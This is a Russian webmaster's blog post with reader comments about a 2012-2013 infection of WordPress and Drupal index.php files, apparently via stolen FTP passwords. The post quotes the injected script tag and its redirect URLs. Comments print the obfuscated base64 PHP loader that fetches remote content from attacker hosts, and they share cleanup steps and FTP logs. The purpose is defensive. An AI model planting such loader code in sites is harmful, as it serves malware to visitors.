Вирусы на сайтах хостинг-центра

ПО ССЫЛКАМ НЕ ХОДИТЬ, УБЬЁТ!

Все мои сайты, хостящиеся у Хостинг-центра взломаны однотипным способом:
26.12.12 15:49 в файл index.php корневого каталога добавлена строка
echo '<script src="хттп:\\kinoshkaxa.changeip.name\rsize.js"></script>';
Используется wordpress разных версий и drupal. Не думаю, что взлом можно объяснить уязвимостью этих CMS. Также сомневаюсь, что к такому могла привести утечка паролей — вряд ли все файлы были модифицированы в одну и ту же секунду. Так что скорее всего взломан сервер и злоумышленник получил root-доступ. В прошлый раз в аналогичной ситуации хостинг-центр перевел стрелки на меня — мол, не уберег пароли. Не верю. Написал им, посмотрю, что ответят.

Кстати, неделю назад сам чуть не подхватил вирус с зараженного таким образом сайта. И ладно бы порнуху пошёл смотреть — искал кое-что по 1С. Хотя коллеги говорят, что это и есть порнуха. Сайт тот до сих пор заражен — 1czone.ru, хотя я им отписал в тот же день. А ещё отписал про этот сайт гуглу и яндексу — никто его как зараженный не помечает до сих пор.

Так что спасение утопающих — дело рук самих утопающих. Пришлось латать дыры в браузере. Расширение NoScript меня не устраивает, уж очень много рубит. В результате нашёл замечательное расширение для Firefox — RequestPolicy, которое позволяет контролировать межсайтовые запросы. Настоятельно рекомендую.

С наступающим Новым годом!

P.S. Скрипт перенаправляет дальше:
хттп:\\gmokcne.gr8name.biz\advjump\2
хттп:\\jqgmjci.ddns.me.uk:5816\milk\largest_wondering_buys.php
Результаты анализа VirusTotal: largest_wondering_buys.php (сейчас уже 12/46, а было 4/46).
Пытался установить мне wgsdgsdgdsgsd.exe (сейчас уже 27/45, было 11)
Сами файлы могу выслать желающим поковыряться.

P.S. Заменил http:// на хттп:\\, а то яндекс считает, что на сайте вредоносный код.

30.12.2012   Рубрики: Интернет

17 комментариев

  1. Evilclown - 14.01.2013

    Спасибо, вылечил сразу жеж, долго искал инфу, а тут просто и понятно.

  2. Дмитрий - 15.01.2013

    Ищите в конце index.php код — 2 функции

    function sql2_safe($in) {
    $rtn = base64_decode($in);
    return $rtn;
    }
    function collectnewss() {
    $get = sql2_safe(«aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==»);
    $content = @file_get_contents($get);
    if (!$content)
    echo sql2_safe(«PHNjcmlwdCBzcmM9Imh0dHA6Ly90b3VjaG1lLmNoYW5nZWlwLm5hbWUvcnNpemUuanMiPjwvc2NyaXB0Pg==»);
    else
    echo $content;
    }
    collectnewss ();

    Это вирус!

  3. Михаил - 18.01.2013

    Предлагаю способы защиты сайта от подобных ситуаций:
    1. Бэкап сайта.
    2. Корректировка обработки запросов GET/POST

  4. Влад - 25.01.2013

    Дмитрий спасибо, долго не мог победить…

  5. Юрис - 27.01.2013

    Дмитрий, спасибо, помог реально. Респект!

  6. allex - 27.01.2013

    У меня до этого код был другой, а 27 января в 11:26 в файле index.php появился код, как у Дмитрия. 🙁 Но теперь у меня стоит WordPress плагин WordPress File Monitor Plus, который по крайней мере сообщает о факте изменения файлов. Вот ещё бы уязвимость найти…

  7. Макс - 31.03.2013

    Действительно, у меня тоже поселился аналогичный вирус на сайте, пока дыру не нашел, лечу бэкапом.
    Но это не выход.
    Мужики, что еще можно против этого вируса, какую защиту придумать

    Заранее буду благодарен

  8. Андрей - 12.04.2013

    А что же логи с подключение к сайту access_log и error — там наверняка ip с которого заразу залили на сайт. В бан его. Глобально то же не выход, но может видно файл к которому обращались.

  9. allex - 12.04.2013

    Нет в логах ничего. А код появился одновременно на всех моих сайтах. Так что я предполагаю, что атака была не через мои сайты.

  10. Илья - 07.05.2013

    Коллеги, воруют у вас FTP пароли. Так что менять нужно в первую очередь их. Плюс, если FTP клиент хранит их в открытом виде, как FileZilla нужно удалить файлы с настройками быстрого подключения:
    http://suhinin.com/2012/08/26/storing-passwords/

    Вот здесь можно немного почитать по заразе
    http://dml.compkaluga.ru/forum/index.php?showtopic=72706

    А вот, собственно, и их создатели. Carberp(одна из разновидностей):
    http://malware.dontneedcoffee.com/2012/12/carberprenaissance.html

    В общем, может дойти до того, что придется переустанавливать систему. А если вы — вебмастер с большим количеством сайтов в FTP, то придется чистить их все.

  11. validero - 08.05.2013

    Да! По ходу FileZilla сливает пароли. Тоже стоял быстрый доступ. Сегодя Яша нашел вредоносный код.
    Залез в index.php, а там вот такая хрень
    function collectnewss() {

    if (!isset($_COOKIE[«iJijkdaMnerys»])) {
    $value = ‘yadeor’;
    $ip = $_SERVER[‘REMOTE_ADDR’];
    $get = sql2_safe(«aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=»).$ip;
    $file = @fopen ($get, «r»);
    $content = @fread($file, 1000);
    @setcookie(«iJijkdaMnerys», $value, time()+3600*24);
    if (!$content)
    echo sql2_safe(«PHNjcmlwdCBzcmM9Imh0dHA6Ly9uZXdkb21tZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=»);
    else
    echo $content;
    }
    }
    collectnewss ();

    Удалил. Потом полез в резервные копии, а там за апрель, такой же как у вас вредоносный код
    Это выходит, что сначала его поставили, а недавно на новый изменили? ВАЩПЕ…
    Побочных эффектов не будет? (Пароли поменял)

  12. Макс - 09.05.2013

    как вариант рекомендую прописать права доступа 444 в index в системе управления и на сайте

  13. Макс - 09.05.2013

    разрешает только читать

  14. Макс - 09.05.2013

    у меня нормализовалось пока

  15. Azx - 10.05.2013

    на 3 сайтах в index.php появилась функция:
    function collectnewss()

    Удалил, поменял пароли, прогнал антивирусом, нашел троян js в кэше firefox. и это при том, что я не посещаю ГС…Кстати странички в соц сетях тоже взломаны.

  16. validero - 12.05.2013

    Ура! Вроде бы победил. 8го вечером подхватил. Всю ночь чистил. 9го мая, когда проснулся, Яндекс уже поздравил с днем победы над вредоносным кодом и снял опалу. (Повезло) Сегодн 12е — пока тихо. Основные действия, которые здесь не упомянуты:
    На FTP-сервере поднимитесь на уровень выше и пересмотрите всю папку webspace.Там перепроверьте все. Почистите вр.коды в https протоколах. Если будут попадаться файлы index.html~ в них тоже прописан скрипт после . Если на сервере несколько сайтов — чистите все.
    Проверьте весь компьютер Через avz4. У меня был измененый модифицированный ключ.
    Все пароли, сохраненные в менеджерах желательно поменять.
    Все остальные действия борьбы с этой заразой, которые я применял, подробно описаны здесь http://www.spravkasleavka.ru/internet/tak-vot-ty-kakoj-rsizejs.html
    Спасибо Михаилу за идею оградить индексы правами 444. Если повториться — попробую.

  17. Дмитрий - 18.05.2013

    Все как у всех )))

    Посмотрел дату изменения файла: 6 мая
    Попросил логи фтп от хостера (внизу кому интересно). Правки вносились через фтп!

    Пароли сохранены в FARmanager.
    Винда 7 — все обновления
    Антивирус NOD — все обновления

    Кроме паролей фтп, наверняка сперли сохраненные пароли в броузерах и почтовых клиентов.

    Кто нашел через что влез вирусняк?

    May 6 22:12:47 mv142 pure-ftpd: (?@212.95.32.78) [INFO] USERNAME is now logged in
    May 6 22:12:48 mv142 pure-ftpd: (USERNAME@212.95.32.78) [INFO] Logout.
    May 6 22:14:01 mv142 pure-ftpd: (?@212.95.32.78) [INFO] USERNAME is now logged in
    May 6 22:14:02 mv142 pure-ftpd: (USERNAME@212.95.32.78) [NOTICE] /home/USERNAME//www/index.php downloaded (5740 bytes, 71897.38KB/sec)
    May 6 22:14:02 mv142 pure-ftpd: (USERNAME@212.95.32.78) [NOTICE] /home/USERNAME//www/index.php uploaded (6007 bytes, 37.64KB/sec)
    May 6 22:14:03 mv142 pure-ftpd: (USERNAME@212.95.32.78) [NOTICE] /home/USERNAME//public_html/index.php downloaded (6190 bytes, 99133.97KB/sec)
    May 6 22:14:04 mv142 pure-ftpd: (USERNAME@212.95.32.78) [NOTICE] /home/USERNAME//public_html/index.php uploaded (6007 bytes, 39.59KB/sec)

Написать комментарий